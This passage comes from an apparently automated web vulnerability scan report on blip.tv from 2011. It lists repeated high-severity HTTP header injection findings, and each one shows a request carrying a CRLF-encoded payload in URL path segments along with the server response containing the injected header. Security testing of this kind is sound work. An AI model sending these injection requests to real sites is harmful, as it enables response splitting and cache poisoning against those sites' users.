Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/7ed3d
7f56045eacf
/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 1025266163
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/7ed3d
7f56045eacf/Armc
...[SNIP]...

2.83. http://blip.tv/file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-HappyNewYear2011AnnapolisFireworks827.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f728c%0d%0aa0fb5fbeeea was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f728c%0d%0aa0fb5fbeeea HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/f728c
a0fb5fbeeea

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1025266212
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f728c
a0fb5fbeeea"
...[SNIP]...

2.84. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cbc6f%0d%0a2a8b44a020e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cbc6f%0d%0a2a8b44a020e/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/cbc6f
2a8b44a020e
/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 366
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1025265566
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/cbc6f
2a8b44a020e/get/Armch
...[SNIP]...

2.85. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 721e9%0d%0ab21d787f4c was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/721e9%0d%0ab21d787f4c/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/721e9
b21d787f4c
/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:18 GMT
X-Varnish: 1324526184
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/721e9
b21d787f4c/Armch
...[SNIP]...

2.86. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog612.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3622e%0d%0aa0bd8450bdc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/3622e%0d%0aa0bd8450bdc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/3622e
a0bd8450bdc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:19 GMT
X-Varnish: 1025265669
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/3622e
a0bd8450bdc"
...[SNIP]...

2.87. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 74609%0d%0a1322f15c35b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /74609%0d%0a1322f15c35b/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/74609
1322f15c35b
/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1274880713
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/74609
1322f15c35b/get/Armch
...[SNIP]...

2.88. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d4d68%0d%0a1394314c0ea was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/d4d68%0d%0a1394314c0ea/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/d4d68
1394314c0ea
/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1248904208
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/d4d68
1394314c0ea/Armc
...[SNIP]...

2.89. http://blip.tv/file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-MusicFtLauderdaleToKeyWest2011OnSeaCart30Sundog994.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 533e1%0d%0a211d4b35ff7 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/533e1%0d%0a211d4b35ff7 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/533e1
211d4b35ff7

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1498215776
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/533e1
211d4b35ff7"
...[SNIP]...

2.90. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 62076%0d%0a4d4800ee83 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /62076%0d%0a4d4800ee83/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/62076
4d4800ee83
/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 360
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 2146044932
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/62076
4d4800ee83/get/Armcha
...[SNIP]...

2.91. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9f7c6%0d%0a842cf0637a0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/9f7c6%0d%0a842cf0637a0/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/9f7c6
842cf0637a0
/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 362
Date: Thu, 20 Jan 2011 00:38:22 GMT
X-Varnish: 2146044976
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/9f7c6
842cf0637a0/Armc
...[SNIP]...

2.92. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy507.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 4d1fa%0d%0a052bf264571 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/4d1fa%0d%0a052bf264571 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/4d1fa
052bf264571

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 1248904636
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/4d1fa
052bf264571"
...[SNIP]...

2.93. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4374a%0d%0a4a21ba9df6e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4374a%0d%0a4a21ba9df6e/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/4374a
4a21ba9df6e
/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 361
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 2146044716
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4374a
4a21ba9df6e/get/Armch
...[SNIP]...

2.94. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 1fc66%0d%0ad6afc4fff45 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/1fc66%0d%0ad6afc4fff45/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/1fc66
d6afc4fff45
/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Content-Length: 347
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 1498215874
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/1fc66
d6afc4fff45/Armc
...[SNIP]...

2.95. http://blip.tv/file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaAtTheStartOfTheBWRSailingAnarchy918.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 70ee7%0d%0aa133d018d57 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/70ee7%0d%0aa133d018d57 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/70ee7
a133d018d57

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:21 GMT
X-Varnish: 1274880934
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/70ee7
a133d018d57"
...[SNIP]...

2.96. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload db778%0d%0ac53aab65b12 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /db778%0d%0ac53aab65b12/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/db778
c53aab65b12
/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1324526368
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/db778
c53aab65b12/get/Armch
...[SNIP]...

2.97. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload acb71%0d%0a5a85065288a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/acb71%0d%0a5a85065288a/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/acb71
5a85065288a
/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 2146044616
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/acb71
5a85065288a/Armc
...[SNIP]...

2.98. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed570.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dd8c1%0d%0a6e997ed3acc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dd8c1%0d%0a6e997ed3acc HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dd8c1
6e997ed3acc

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:20 GMT
X-Varnish: 1324526444
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dd8c1
6e997ed3acc"
...[SNIP]...

2.99. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5d762%0d%0ad5b2cd9879d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5d762%0d%0ad5b2cd9879d/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/5d762
d5b2cd9879d
/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Thu, 20 Jan 2011 00:38:23 GMT
X-Varnish: 2146045095
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5d762
d5b2cd9879d/get/Armch
...[SNIP]...

2.100. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e5932%0d%0abe8481e9c38 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e5932%0d%0abe8481e9c38/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/e5932
be8481e9c38
/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 336
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 2146045135
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
